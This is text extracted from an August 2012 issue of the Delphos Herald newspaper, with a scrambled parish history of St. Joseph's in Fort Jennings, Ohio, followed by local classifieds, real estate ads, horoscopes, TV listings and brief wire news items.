very well but then came the renovations of many Catholic Churches. St. Joseph’s became a victim of this popular (or unpopular) project. The beautiful ornate wooden altars were removed, as were the pulpit and the Communion rail. The wood was said to be deteriorating. The Tabernacle was moved to the right side of the Sanctuary. Naturally a new paint job was in order, carpeting was installed and restrooms built in the basement. In 1975 the first Son of the Parish was ordained to the priesthood. He was Dennis Ricker, son of Virgil and Angela (Rahrig) Ricker. He died at a young age in 1990, after serving in Texas and Ohio. The Blizzard of 1978 hit Fort Jennings and much of Ohio. Father Fortman said one Mass on Sunday but very few parishioners were able to brave the elements to get there. Father William Conces retired to Fort Jennings in 1979. He remained in the parish for 5 years. Father Fortman made plans to celebrate the 100th Anniversary of the building of the church but was transferred before the celebration. His request for a parish history was carried out in 1984. Father John J. Shanahan, a native of Lima was appointed pastor in July of 1983. He was a Priestly Man with a ready smile. He started the prebaptismal program and the prenuptial counseling sessions. The last teaching Sisters retired in 1983, ending 70 years of teaching by the Sisters of St. Francis. Sister Norbertine Loshe remained in Fort Jennings for 5 years as coordinator of the religious education program. Sister Julie Grote made her home in Fort Jennings also. They both moved on in 1996 after Sister Norbertine celebrated the 60th Anniversary of her religious profession. Several young women from the parish have dedicated their life to Christ by entering the Sisters of St. Francis, Tiffin. They are: Sister Alma Ricker, Sister Carol Ann Pothast, Sister Edna Ricker, Sister Gemma Fenbert, Sister Mary Ann Lucke, Sister Virginia Fisher, Sister M. Euphrasia Wallenhorst, Sister T. Jane Schimmoeller, Sister Vincent DePaul Kohls and Sister Ruth Wieging. Sister Ruth later returned to the private life and married. The Centennial of the church building was held on 25 March 1984. After a Solemn Latin Mass the men of the parish served a dinner. It was attended by members of both St. Joseph’s parish and the St. John’s Lutheran members. The second son of the parish, Timothy Maag was ordained a priest in 1992. In 1996 he took a leave of absence from his ministry. Father Michael Schelling, a Defiance native was appointed the 19th Pastor of St. Joseph’s. During his pastorate, in 1995, girl Mass servers were introduced. Alissa Hamond and Heather Kaverman had the privilege of being the first to serve for Father Schelling. Another fourth grader, Brianne VonLehmden also joined the ranks, following training by Elvera Wieging. Parish organizations also changed. The Altar Rosary Society disbanded in 1996. The Sodality, (for unmarried Persons) and the St. Joseph’s Society also became inactive. The Catholic Ladies of Columbia remained very active. Read more in Wednesday’s Herald.
Interior in the Lutheran church.
were upset because of repeated sermons on race and suicide. “But what really riled their feathers was that many good people were refused absolution the confessional for trivial reasons.” Some of those old “missions” were fire and brimstone. In 1921 the new sanctuary windows, which were made in Germany, were installed. That was the same year the township and village public schools were consolidated. Transportation was provided to everyone. At that time the parochial school had about 130 students. St. Joseph’s School operated as a parochial grade school until January 193l. It was in December of 1930 when the Fort Jennings Board of Education made a contract with St. Joseph Parish to use the parochial school building for a public school for grades 1 to 8. The consolidation was complete. During the roaring twenties the men of the parish held a picnic in VonLehmden’s grove. The pastor remarked “No dance nor foolish doings were allowed.” In March of 1920, an early morning storm damaged the slate roof of the church and blew down the chimneys. Another interesting controversy arose as to whether the Ben Dickman family belonged to the Fort Jennings Parish or Kalida. Father Rupert of Delphos St. John’s came to decide the issue. He believed the family lived closer to Fort Jennings. Also members of a neighboring parish came to Fort Jennings for Saturday confessions because they were up in arms about their pastor making requests for money in and pews were revarnished in preparation for the celebration. The high school band let the procession for this event. The book “First One Hundred Years of St. Joseph’s Parish” was written at this time. A summer migrant program was initiated by Father Miller in 1958. This was the first federally funded program of this kind in the nation. It provided an educational program for Mexican American Children from 1958 to 1978. Sometimes there was also a fall session. Children were bused from migrant camps in Delphos, Kalida and Ottoville also. The school was taught by the Sisters and other volunteers at the grade school. In 1958 Pope Pius XII passed away and Pope John XXIII was elected to succeed him. The following year the Rev. Gerald M. Stein was assigned to Fort Jennings as the first assistant pastor. Father Miller was aging and needed help. The annual St. Joseph’s “Homecoming” on the 2nd Sunday of August is another of Father Miller’s accomplishments. This festival was held outside in tents on the church grounds. The big event continues to this day with delicious home – cooked meals. Activities keep changing with the times. During Father Miller’s pastorate our country got involved in 2 more wars. Young men had to march off to Korea in the 50s and Vietnam in the 60s and 70s. We are thankful they all returned alive. This was also the year the school district was told to remove crucifixes and other religious items from the school
Classifieds
Minimum Charge: 15 words, 2 times - $9.00 Each word is $.30 2-5 days $.25 6-9 days $.20 10+ days Each word is $.10 for 3 months or more prepaid
Saturday, August 25, 2012
The Herald - 9.
010 Announcements 020 Notice DELPHOS HERALD
THE
Telling The Tri-County’s Story Since 1869
080 Help Wanted
CLASS A CDL Driver Needed. Class A CDL semi-truck driver needed for various routes. Candidates must be 21, have 2 years’ experience, valid Class A CDL driver’s li cense, clean driving record. Hours: Mon-Fri 7am-4pm. K&M Tire 965 Spencerville Road, PO Box 279 Delphos, OH 45833. ATTN: Rachel Mitchell RachelM@kmtire.com Fax: 419-879-4372
080 Help Wanted
LPNS NEEDED for homecare in Lima area for 3rd shift. HHA/STNAs needed in Lima, Wapak, Van Wert and Delphos areas. Daytime and evening hours available. Apply at Interim HealthCare 3745 Shawnee Rd., Lima or call 419-228-2535 OTR SEMI DRIVER NEEDED Benefits: Vacation, Holiday pay, 401k. Home weekends & most nights. Call Ulm!s Inc. 419-692-3951 PART-TIME RURAL Route Driver needed. Hours vary, Monday-Saturday. Valid driver’s li cense and reliable transportation with insurance required. Applications available at The Delphos Herald office 405 N. Main St., Delphos. PAT’S DONUTS and Kreme Hiring 2nd shift 1pm-9pm Part-time and Full time. Drug screen contingent upon hiring. Send Resume/apply at 662 Elida Ave., Delphos
080 Help Wanted
DRIVERS-REGIONAL: HOME Weekly! Great Benefits! 4wks Vacation. $.40/mile. CDL-A, Recent OTR Exp req’d. Dave: 937-726-3994 or 800-497-2100 SPHERION -SPECIAL Recruiting Event August 27-31, Door Prizes, Refreshments. Wear your favorite teams colors & be entered into drawing for $50 gift card. Apply online: Select: Industrial - Lima search. For more info: 419-227-0113
290 Wanted to Buy
IS YOUR AD HERE?
Call today 419-695-0015
Deadlines: 11:30 a.m. for the next day’s issue. Saturday’s paper is 11:00 a.m. Friday Monday’s paper is 1:00 p.m. Friday Herald Extra is 11 a.m. Thursday
005 Lost & Found
We accept
ENROLL TODAY
LOST DOG -Area of SR-66 and Carpenter Rd. Small brown terrier mix. Family Pet. 419-234-2252
Raines Jewelry
Scrap Gold, Gold Jewelry, Silver coins, Silverware, Pocket Watches, Diamonds.
We Have:
Cash for Gold
2330 Shawnee Rd. Lima (419) 229-2899
• Grass Seed • Top Soil • Fertilizer • Straw
Classifieds Sell
ACCEPTING CHILDREN 3-5
ON STATE RT. 309 - ELIDA 419-339-6800
VIEW PICTURES AND DETAILS
JIMLANGHALSREALTY.COM Since 1980 419-692-9652
integrity • professionalism • service
Kreative 040 Services Learning LAMP REPAIR Table or floor. Preschool Come to our store.
340 W. Fifth St. Delphos, OH 45833 419-695-5934
Hohenbrink TV. 419-695-1229
340 Garage Sales
MULTI-FAMILY GARAGE Sale. 1245 S. Erie St. 8/24, 9am-4pm. 8/25, 9am-1pm. Infant-adult clothing, scrubs, school supplies, bedding, jewelry, canning jars, furniture, plants, trees, & misc.
7000 Defiance Trail
4 bdrm. 3 ½ bath home on 7.26 acres, just east of Delphos. Included with property: 3 rental homes, 2 ponds, wooded area, garden and great scenery, very unique, rentals could pay entire mortgage!
3 or 4 bedrm. brick home, 3 Exceptional 4 bedrm., 2 bath home, acre lot, outbuilding with liv. modern kitch. with hardwood floor, Florida rm., den, basement, very spaquarters, a must to see!!
8375 Redd Rd.
425 N. Clay St.
Shop Herald Classifieds for Great Deals
DRIVERS; LOCAL. Home Daily. New pay package and excellent benefits. Average 2000mi/week. CDL-A 1yr experience required. 419-232-3969
at Vancrest Health Care Center
We need you...
cious, immediate possession!
ABSOLUTE PUBLIC AUCTION
6:00 PM – Tuesday – Aug 28 – 6:00 PM LOCATION: 103 N. Main Middle Point, OH
NEW LISTING
409 S. Clay St. Delphos
Priced for quick sale!
1 1/2 STORY HOME - GARAGE
Could easily be the mother of bargains for this year’s home auctions; square, straight modest sized older home needing some help but with major monies spent; 3 beds, up/down; modern bath, large rear utility houses the high efficiency furnace w/air; modern 200 AMP breaker box; kitchen w/ newer oak cupboards, and living room w/hardwood; covered rear patio and small wooden front deck; detached two car; the bargains are REALLY in the small communities – we’ll guess this home will EASILY pay for itself as a rental in 3 to 5 years . . . . or an inexpensive owner occupied; price range of a good used automobile . . . . . SELLS to the highest bidder that evening; TERMS: $1,000 deposit w/balance in 30 days; warranty deed awarded w/ taxes prorated and possession upon closing; ATTORNEY for the heirs, Mr. Scott Gordon, Van Wert, OH; showing – your convenience - STRALEYREALTY.COM
SELLERS: HEIRS OF RUTH A. MIHN AUCTIONEERS: William C. Straley; Chester M. Straley; Philip Fleming, App
HIRING DRIVERS with 5+ years OTR experience! Our drivers average 42cents per mile & higher! Home every weekend! $55,000-$60,000 annually. Benefits available. 99% no touch freight! We will treat you with respect! PLEASE CALL 419-222-1630
Vancrest of Delphos is a long-term care facility providing skilled rehabilitation services, assisted living, post acute medical care and more. We are looking for caring, outgoing, energetic, skilled STNA’s to join our team. Full time and part time positions are available, for all shifts. Visit us at Vancrest for details and application information.
STNAs
501 Misc. for Sale
FOR SALE: Pioneer Stereo Surround System w/five speakers, CD Player, Double Cassette Deck, Virtual Dolby Surround, with 100W 4ch Equal Power Amp. Paid $1000 new asking $250. Phone: 419-236-8642
530 Farm Produce
Kings Elida Grown Blackberries
419-339-1968
Cindy Alexander 419-234-7208
AlexanderRealtyServices.Net
OPEN HOUSE
9am-5pm Fri., Sat. & Sun.
19176 Venedocia-Eastern Rd., Venedocia
Beautiful country 4 bedroom, 1 1/2 bath, oversized 2 car garage. Updated everywhere. Must See! $89,900. Approx. monthly payment - $482.60
Vancrest of Delphos
1425 E. Fifth St. Delphos, OH 45833
SCHRADER REALTY LLC
“Put your dreams in our hands”
Office: 419-692-2249 Fax: 419-692-2205 202 N. Washington Street Delphos, OH 45833
Krista Schrader ................ 419-233-3737 Ruth Baldauf-Liebrecht ... 419-234-5202 Jodi Moenter ................ 419-296-9561 Amie Nungester ............... 419-236-0688 Stephanie Clemons...... 419-234-0940 Janet Kroeger .................. 419-236-7894 Judy M.W. Bosch ......... 419-230-1983
Advertise Your Business
DAILY
For a low, low price!
Call for Pricing Sold by pints
SWEET CORN, tomatoes, peaches, mums available at Gessner’s Produce. 1mile North of Delphos, Rt. 66. Ph.419-692-5749
OPEN HOUSES
1:30-2:30p.m. 615 Cass St., Delphos
SUNDAY, AUG. 26, 2012
CLARK Real Estate
OPEN HOUSES
1:00-2:30 p.m.
483 S. Franklin St. 907 E. Third St. 480 N. Main Street
SUNDAY, AUG. 26
419-695-1006 419-204-7238 419-234-2254 419-204-7238
Dick
FIRST TIME OPEN! 3BR, 2BA ranch on dead end street, 2 car garage, 3 city lots. Jodi will greet you
821 E. Cleveland St., Delphos
Delphos $99,900 Jack Adams Delphos $83,000 Chuck Peters Ft. Jennings $89,000 Elaine Wehri Delphos $84,000 Chuck Peters
550 Pets & Supplies
FREE REX Rabbit, male. 2 years old. Call 419-968-2860.
CLARK Real Estate
EVERYTHING WE TOUCH TURNS TO SOLD
“The Key To Buying Or Selling”
3:00-4:00p.m. 11959 Converse Roselm Rd., Delphos 411 E. Third St., Delphos
Dick
FIRST TIME OPEN! Ranch with 3 bedroom, attached garage, large yard. Krista will greet you.
3:00-4:30 p.m.
436 East 9th Street
Don’t make a move without us!
Custom built 4BR, 3BA, over 3300 sq ft, 1.5 acre, 2 car garage plus additional garage, Delphos schools. Krista will greet you. 3 Bedroom-2 bath homeclose to schools and churches, only $50’s Janet will greet you.
FOR A FULL LIST OF HOMES FOR SALE & OPEN HOUSES:
View all our listings at dickclarkrealestate.com
675 W. Market St., Suite 120, Lima, OH 312 N. Main St. Delphos, OH Phone: 419-879-1006 Phone: 419-695-1006
• Pet Food • Pet Supplies • Purina Feeds
940 E. FIFTH ST., DELPHOS
419-692-7773 Fax 419-692-7775
419-339-6800
On S.R. 309 in Elida
BY APPOINTMENT
$49,900-Van Wert SD NEW LISTING! Cape Cod home with 2BR/1BA with approx 1700 sq ft living space on .84 acre lot. Enclosed porch, outbuilding. (47) Allison Sickles 567-204-3889 3BR/1BTH ranch on 1 acre lot. Approx 1336 sq ft. 2 car attached garage. Above ground pool. (167) Kathy Mathews 419-233-3786 $58,900-Spencerville SD Price Reduced Vinyl two-story home with 4 bedrooms, 1 full bath and 2 half baths, approx. 2826 sq. ft., 2 car detached garage, handicap accessible entry. (141) Mike Reindel 419-2353607 $14,500-Spencerville SD Building Lot .460 acre lot located in Spencer Township. (115) Mike Reindel 419-235-3607 $38,000-Spencerville SD Commercial Building One story commercial building with approx. 1548 sq. ft., .085 acre lot, currently a flower shop. (114) Mike Reindel 419-235-3607
419-692-SOLD 419-453-2281
Under $45,000
218 Mahoning, Cloverdale: House, Garage, Huge Lot. Asking $29,000. Call Tony. Ottoville SD Lots: Next to school. Call Tony OPEN SATURDAY 1:00-3:00 Kalida Golf Course: 2 Avail. Tony: 233-7911. 19183 SR 697, Delphos: 3 BR Country Ranch on 1+ acre. Garage. Call Del Kemper: 204-3500. 126 / 128 Church St., Ottoville: Big brick beauty. Currently a duplex showing good return. Could be restored to single family. Huge garage. Call Tony: 233-7911. New Listing!!!: 18824 Rd 20P, Ft. Jennings: 3 BR, 2 Bath, Country Ranch on basement. Updated inside and out. Call Tony: 233-7911. 337 Walnut, Ottoville: REDUCED! 3 BR, 2 Bath, Updated throughout. Fish Pond, Garage & Stg Bldg. Owners re-locating. Tony: 233-7911 609 Broad, Kalida: 3 BR, 2 Bath on scenic 4+ acre lot. Garden Shed and much more. Tony. New Listing! 202 S. 4th Kalida: 4 BR, completely updated in and out. Huge garage. Corner lot. Call Tony: 233-7911:
560 Lawn & Garden
HUSKEE RIDING Lawn Mower. 20HP 50inch cut. Needs new starter. $200 OBO. Call 419-230-1029
590 House For Rent
2 BEDROOM, 1Bath house available soon. No pets. Call 419-692-3951
$45,000-$75,000
902 Spencerville Rd, Delphos: REDUCED!!! 3 BR, 1 Bath, 2 Car Garage, Vinyl Siding. Lynn: 234-2314. 311 W. 5th, Delphos: 3 BR, 1 Bath. Affordable Living!!! $55K Tony: 233-7911.
600 Apts. for Rent
1BR APT for rent, appliances, electric heat, laundry room, No pets. $425/month, plus deposit, water included. 320 N. Jefferson. 419-852-0833. FOR RENT or rent to own. 2 Bdrm, 2 bath double wide located in Southside community in Delphos. Call 419-692-3951. FORT JENNINGS- Quiet secure 1 & 2 bedroom in an upscale apartment complex. Massage therapist on-site. Laundry facilities, socializing area, garden plots. Cleaning and assistance available. Appliances and utilities included. $675-775/mo. 419-233-3430 LARGE UPSTAIRS Apartment, downtown Delphos. 233-1/2 N. Main. 4BR, Kitchen, 2BA, Dining area, large rec/living room. $650/mo. Utilities not included. Contact Bruce 419-236-6616
$76,000-$100,000
S
950 Car Care
535 N. Washington, Delphos: 3 BR, Many updates including new roof, driveway, windows. $89K. Call Del Kemper: 2043500. REDUCED 466 Dewey, Delphos: Excellent Ranch home with new windows, heat pump, & Central A/C. Call Gary: 6921910. 828 N. Main, Delphos: 4 BR, Newer shingles. Nice interior. Owner wants offer. Tony: 233- OPEN SUNDAY 12:00-1:00 7911. 101 Auglaize, Ottoville: 5/6 $101,000-$150,000 BR, 3 bath home with countless upldates. Ton of home for the money. Call Tony: 2337911
Or send qualifications by mail to: AAP St. Marys Corporation 1100 McKinley Road St. Marys, Ohio 45885 Attention: Human Resource-DH
SERVICE DIRECTORY
Amish Crew
Needing work
Roofing • Remodeling Bathrooms • Kitchens Hog Barns • Drywall Additions • Sidewalks Concrete • etc. FREE ESTIMATES
ervice
220 Maple Lane, Ft. Jen- for color photos and full nings: : Impeccable 3 BR descriptions of all of these Brick Ranch on Full Basement. fine properties. Then, call Call Tony for more details on the agent listed to arrange a this exclusive listing: 233-7911. viewing of your new home!!!
AT YOUR
GO TO: Lawn Care
Geise
Transmission, Inc.
• automatic transmission • standard transmission • differentials • transfer case • brakes & tune up
2 miles north of Ottoville
SPEARS
LAWN CARE
Total Lawncare & Snow Removal
22 Years Experience • Insured
COMMUNITY SELF-STORAGE
GREAT RATES NEWER FACILITY
810 Parts/Acc.
Auto Repairs/
Midwest Ohio Auto Parts Specialist
Windshields Installed, New Lights, Grills, Fenders,Mirrors, Hoods, Radiators 4893 Dixie Hwy, Lima
419-733-9601
POHLMAN POURED
CONCRETE WALLS
Residential & Commercial • Agricultural Needs • All Concrete Work
Commercial & Residential
419-692-0032
Across from Arby’s
419-453-3620
950 Construction
Tim Andrews
MASONRY RESTORATION
•LAWN MOWING• •FERTILIZATION• •WEED CONTROL PROGRAMS• •LAWN AERATION• •SPRING CLEANUP• •MULCHING & MULCH DELIVERY• •SHRUB INSTALLATION, TRIMMING & REMOVAL•
Lindell Spears
950 Tree Service
1-800-589-6830
TEMAN’S
OUR TREE SERVICE
• Trimming • Topping • Thinning • Deadwooding Stump, Shrub & Tree Removal Since 1973
840 Mobile Homes
RENT OR Rent to Own. 2 bedroom, 1 bath mobile home. 419-692-3951.
419-695-8516
check us out at
920 Merchandise
Free & Low Price
Mark Pohlman
Chimney Repair
419-339-9084 cell 419-233-9460
419-692-7261
Bill Teman 419-302-2981 Ernie Teman 419-230-4890
419-204-4563
950 Miscellaneous
POHLMAN BUILDERS
ROOM ADDITIONS
GARAGES • SIDING • ROOFING BACKHOE & DUMP TRUCK SERVICE FREE ESTIMATES FULLY INSURED
2 TWIN size bedspreads, pastel floral design. In good condition, $20 each. Call 419-692-7264.
Advertise Your Business
SAFE & SOUND
SELF-STORAGE
Security Fence •Pass Code •Lighted Lot •Affordable •2 Locations
Why settle for less?
L.L.C.
Place A Help Wanted Ad
In the Classifieds The Daily Herald
DAILY
For a low, low price!
DELPHOS
• Trimming & Removal • Stump Grinding • 24 Hour Service • Fully Insured
Send qualifications by mail to: AAP St. Marys Corporation 1100 McKinley Road St. Marys, Ohio 45885 Attention: Human Resource-CG
Call
Mark Pohlman
419-339-9084 cell 419-233-9460
KEVIN M. MOORE
419-692-6336
(419) 235-8051
419 695-0015
10 - The Herald
Saturday, August 25, 2012
Tomorrow’s Horoscope
By Bernice Bede Osol
SUNDAY, AUGUST 26, 2012 New people will be entering your life in the year ahead and could become extremely important in some of your affairs. One or more of them might have a positive influence in furthering your ambitions. VIRGO (Aug. 23-Sept. 22) -When trying to promote something important, use a soft sell rather than a hard pitch. Your audience will be able to better visualize what you say when you paint some verbal pictures. LIBRA (Sept. 23-Oct. 23) -Because you’re equally as intuitive as you are logical, your business instincts could be better than usual. With this combination working on your behalf, it should spell big profit. SCORPIO (Oct. 24-Nov. 22) -You won’t have to do anything out of the ordinary to attract attention. You won’t go unnoticed, regardless of the size of the crowd or type of people in attendance. SAGITTARIUS (Nov. 23-Dec. 21) -- Should you get involved in something of a confidential nature, make sure that you don’t mention your plans to people who are not key players. There’s no reason to involve outsiders. CAPRICORN (Dec. 22-Jan. 19) -- Sometimes, people come to us for advice but don’t really listen to anything we have to say. This won’t be true in your case -- your reputation will command respect and deference. AQUARIUS (Jan. 20-Feb. 19) -Many of your best ideas will involve ways to further your ambitions and add to your resources. This might encourage you to aim for many different kinds of targets. PISCES (Feb. 20-March 20) -- You’re likely to make an indelible impression on others, not because of any heroic deed, but because of all the little acts of thoughtfulness you display. ARIES (March 21-April 19) -Although you might not be invited to participate in a friend’s undertaking, you can create your own venture and perhaps have even more fun. Do your own thing. TAURUS (April 20-May 20) -Do what you want to do in concert with others, rather than going it alone. Not only will things be easier to pull of, you’ll also have a lot more laughs and joy being with others. GEMINI (May 21-June 20) -- When your artistic and creative attributes start vying for attention, find some time to respond to them. Chances are you’ll produce something of beauty that’ll last a lifetime. CANCER (June 21-July 22) -- You’ll feel more satisfied if you select activities that require both mental and physical agility. Better yet, engage in games that stimulate competition. LEO (July 23-Aug. 22) -- Owing to the good auspices of others, your possibilities for gain look exceptionally promising. You’ll do especially well getting involved with persons who have generous natures. MONDAY, AUGUST 27, 2012 Several significant successes are likely to be in the offing for you in the year ahead. Onlookers might view your objectives as unduly complicated, but you’ll see them as simple, because they’ll be labors of love. VIRGO (Aug. 23-Sept. 22) -Insincerity will be instantly detected and result in you being labeled a shallow person. If you can’t honestly find something worth praising in another, there’s something wrong with you. LIBRA (Sept. 23-Oct. 23) -Thinking big doesn’t mean a thing unless you put your words into action. The only way you can achieve noteworthy successes is to earn them through effort and application. SCORPIO (Oct. 24-Nov. 22) -- Instead of viewing matters realistically, you’re likely to color facts to suit your expectations. Self-deception will result in huge disappointments. SAGITTARIUS (Nov. 23-Dec. 21) -- Even though it might be hard to convince you otherwise, the world doesn’t owe you any free rides. You shouldn’t expect anything more than what you deserve. CAPRICORN (Dec. 22-Jan. 19) -- Be mindful of your behavior, or else it will be far too easy for you to be overly attentive to someone who doesn’t deserve it while totally ignoring someone who does. AQUARIUS (Jan. 20-Feb. 19) -- A commitment you make might be of little importance to you but quite significant to the person to whom you’re making it. Be sure to honor your word. PISCES (Feb. 20-March 20) -- Pretending to be something other than what you are will be detected by your friends and will make a poor impression on them. The world will love you more if you are your own sweet self. ARIES (March 21-April 19) -- Do not be too disappointed if someone whom you’re very fond of does not live up to your expectations. Leave him or her some room to be human -- no one is perfect all the time. TAURUS (April 20-May 20) -- Stop and think before you open your mouth, or you could experience one of those embarrassing moments when you say the wrong thing, at the wrong time, to the wrong person. GEMINI (May 21-June 20) -- Thinking you have to be a big spender in order to impress someone is barking up the wrong tree. If you have to drop a lot of dough to get someone’s attention, then he or she isn’t anybody you want to know. CANCER (June 21-July 22) -- When it comes to one-on-one relationships, treat everyone as an equal and forgo all forms of brinksmanship. If you try to put on any airs or affectations, someone will trump you. LEO (July 23-Aug. 22) -- Unless you keep pace with your obligations and duties, you are likely to sweep certain obligatons under the rug. If you do, you’ll pay a hefty price later on.
HI AND LOIS
BLONDIE
BEETLE BAILEY
SNUFFY SMITH
HAGAR THE HORRIBLE
Saturday Evening
WPTA/ABC NASCAR Racing WHIO/CBS NFL Football WOHL/FOX Cops ION Psych A&E AMC
8:00
8:30
9:00
9:30
10:00
10:30
WLIO/NBC America's Got Talent
Cops
Cable Channels
WrestleMania 28 Mobbed Psych
Law & Order: SVU Local Psych Barter Barter
Local Local Local Touch Psych
11:00
11:30
August 25, 2012
12:00 12:30
Saturday Night Live 30S Psych Storage Tanked
Local Storage
Storage Storage Barter Barter Tombstone ANIM My Cat From Hell Tanked BET All About Coming to America BRAVO Ocean's Eleven CMT Smokey-Bndt. 2 Redneck Vacation CNN America to Work Piers Morgan Tonight COMEDY Blades of Glory DISC Moonshiners Moonshiners DISN Jessie Austin Phineas Phineas E! Julie & Julia ESPN High School Football ESPN2 WNBA Basketball ESPN All-Access FAM The Notebook FOOD Restaurant Stakeout Restaurant Stakeout FX Wanted HGTV Love It or List It Love It or List It
Barter Barter Tombstone Tanked Tanked Roll Bounce O Brother, Where Art Redneck Island Redneck Vacation CNN Newsroom America to Work Youth in Revolt Yukon Men Moonshiners Good Luck Good Luck Vampire Vampire Fashion Police Baseball Tonight SportsCenter High School Football Time Traveler Restaurant Stakeout Iron Chef America Anger Wilfred Biased Hunters Hunt Intl Hunters Hunt Intl
BORN LOSER
Redneck Island Piers Morgan Tonight Tosh.0 Tosh.0 Yukon Men Austin Austin The Soup Chelsea SportsCenter Restaurant Stakeout Louie Wilfred Love It or List It
Premium Channels
HBO MAX SHOW
Pawn Pawn Fatal Honeymoon MTV Teen Mom Teen Mom NICK Victoriou Victoriou SCI Thirteen Ghosts SPIKE Walking Tall TBS Big Bang Big Bang TCM The Razor's Edge TLC 20/20 on TLC TNT Sherlock Holmes TOON Catch That Kid TRAV Ghost Adventures TV LAND Griffith Griffith USA NCIS VH1 100 Greatest Artists WGN MLB Baseball
HIST LIFE
Pawn
Pawn Pawn Pawn Pawn Pawn Pawn Officer Murder Fatal Honeymoon Teen Mom Teen Mom Teen Mom Awkward. Victoriou Victoriou Yes, Dear Yes, Dear Friends Friends Friends Haunted High House of Bones The Transporter 2 Crank: High Voltage The Wedding Date Mean Girls Jesse James 20/20 on TLC 20/20 on TLC 20/20 on TLC 20/20 on TLC National Treasure Home Mov. King/Hill King/Hill Fam. Guy Dynamite Boondocks Bleach Samurai 7 Ghost Adventures Ghost Adventures Ghost Adventures Ghost Adventures King King King King King King King King NCIS NCIS White Collar Land of the Lost Hard Rock Calling A Few Good Men WGN News at Nine Funniest Home Videos Chris Chris 24/7 Road 2 Days
Pawn
FRANK & ERNEST
Sunday Evening
8:00
Very Harold & Kumar 3D True Blood Very Harold & Kumar 3D Aliens Strike Back Tower Heist The Rock Katt Williams Larry Wilmore's
©2009 Hometown Content, listings by Zap2it
WLIO/NBC NFL Football WOHL/FOX Simpsons Simpsons
WPTA/ABC Once Upon a Time WHIO/CBS Big Brother
8:30
Extreme Makeover The Good Wife
9:00
9:30
10:00
The Mentalist
10:30
Cable Channels
A&E AMC
ION
Flashpoint
Fam. Guy Fam. Guy Local Flashpoint Leverage
Local Local Local
11:00
11:30
August 26, 2012
12:00 12:30
Dateline NBC Leverage
Weeds
Episodes
BIG NATE
Leverage
Storage Storage Storage Storage Storage Storage Storage Storage Storage Storage Joe Kidd Hell on Wheels Breaking Bad Town Breaking Bad Hell on ANIM Off Hook Off Hook Wildman Wildman Wildman Wildman Off Hook Off Hook Wildman Wildman BET Sunday Best Sunday Best Sunday Best Together Together Paid Inspir. BRAVO Housewives/NJ Housewives/NJ Housewives/NJ Below Housewives/NJ TBA CMT Redneck Redneck Island Redneck Island Redneck Island Redneck Island Redneck CNN Count CNN Newsroom CNN Presents Piers Morgan Tonight COMEDY Without Jeff Dunham: Controlled Chaos Tosh.0 Futurama The Burn South Pk Jeff Dunham DISC Survivorman Ten Days One Car Too Far Bering Sea G. One Car Too Far Bering Sea G. DISN Good Luck Gravity ANT Farm Jessie Phineas Phineas Shake It Shake It Vampire Vampire E! Kardashian Kardashian Jonas Kardashian Jonas Kardashian ESPN MLB Baseball SportsCenter SportCtr ESPN2 Softball MLS Soccer NHRA Drag Racing Football First FAM Aladdin Aladdin J. Osteen Ed Young FOOD Cupcake Wars Food Truck Race Iron Chef America Chopped Food Truck Race FX Taken Taken Surrogates HGTV Property Brothers Holmes Inspection Handyman Holmes Inspection Holmes Inspection
GRIZZWELLS
Premium Channels
HBO SHOW MAX
American Pickers Fatal Honeymoon MTV Ridic. The Inbet NICK My Wife My Wife SCI Raidrs-Lost Ark SPIKE Bar Rescue TBS Valentine's Day TCM Ball of Fire TLC Hoard-Buried TNT Sherlock Holmes TOON Annoying Regular TRAV Man v Fd Man v Fd TV LAND M*A*S*H M*A*S*H USA Law & Order: SVU VH1 Love, Hip Hop WGN How I Met How I Met
HIST LIFE
Ice Road Truckers Drop Dead Diva Ridic. Ridic. Nick News George Indiana Jones Bar Rescue
Ice Road Truckers Shark Wranglers Army Wives Fatal Honeymoon Jackass: Number Two Yes, Dear Yes, Dear Friends Friends Flip Men
American Pickers Jackass: Number Two Friends Friends Blade Runner Bar Rescue Friendly Persuasion High School Moms The Great Escape Aqua The Eric Meat Meat King King Law & Order: SVU Mama Drama Monk The Newsroom
Flip Men Bar Rescue Valentine's Day Man of the West Hoard-Buried High School Moms Hoard-Buried Leverage The Great Escape Leverage Venture King/Hill King/Hill Fam. Guy Fam. Guy Dynamite Meat Meat Big Beef Paradise Steak Paradise King King King King King King Law & Order: SVU Law & Order: SVU Burn Notice Big Ang Big Ang Hollywood Exes Big Ang Big Ang How I Met How I Met News/Nine Replay The Unit True Blood Homeland The Newsroom Tower Heist Weeds Episodes True Blood Weeds Episodes
PICKLES
Very Harld 3D The Birdcage Dexter
©2009 Hometown Content, listings by Zap2it
Episodes
Web Ther.
Gunman killed outside Empire State Mexican Navy: Police fired on US gov’t vehicle Building likely didn’t have time to fire
NEW surveillance video shows Johnson pointing his weapon at police, but it’s likely he did not get a chance, who neighbors had seen leave his apartment in a suit every day since he was laid off a year ago, had worked for six years for
Saturday, August 25, 2012
The Herald — 11
MEXICO CITY (AP) — Mex. Another official said they were in stable condition. The U.S. Embassy had not released details of the shooting or the names of the victims nearly 12 hours later. The Navy said in a written statement that federal police shot the U.S. vehicle, but its description of the incident left out key details of how the shooting occurred. It said at least four vehicles opened fire on the Americans’ sport utility vehicle on a road south of Mexico City, but did not make clear if any of the four carried federal police officers. A U.S. official who was briefed on the shooting said, however, that all the shots were fired by federal police, of which at least 12 officers were being held for questioning by Mexican authorities. The U.S. Embassy employees were on their way to do training or related work at a nearby military base, the official said. The Navy said the embassy personnel were heading down a dirt road to the military installation when a carload of gunmen opened fire on them and chased them and a Navy officer accompanying them. The shooting broke out in an area that has been used by common criminals, drug gangs and leftist rebels in the past..
PR guru: More Harry material may emerge Syrian regime airstrikes kill 21 in eastern city
LONDON (AP) —old while abroad.
BEIRUT (AP) —. Human rights groups say more than 20,000 people have been killed in Syria since the uprising against Assad erupted in March 2011 and evolved into a civil war. The bloodshed already has spilled over into neighboring countries.
Andy North
.
Financial Advisor
1122 Elida Avenue Delphos, OH 45833 419-695-0660
Member SIPC
2012 Model ClearanCe
2012 CHEV IMPALA
#12NC904. 1 LT pkg., spoiler, aluminum wheels. Up to 30 MPG EPA EST. MSRP................................................$28,190.00 DELPHA DISCOUNT ...............................636.63 SUPPLIER PRICE ..............................27,553.37 REBATE ................................................3,750.00 23,803.37 LOVE IT OR LEAVE REBATE .................500.00
2012 CHEV SONIC
5 door. #1290961. 10 air bags, anti-lock brakes, auto. trans., orange. Up to 35 MPG EPA EST. NOW .................................................$17,415.16 LOVE IT OR LEAVE IT REBATE .............250.00
2012 CHEV 1/2 TON XTD CAB
$
23,30337*
2012 BUICK LaCROSSE
$
93*
$
17,16516*
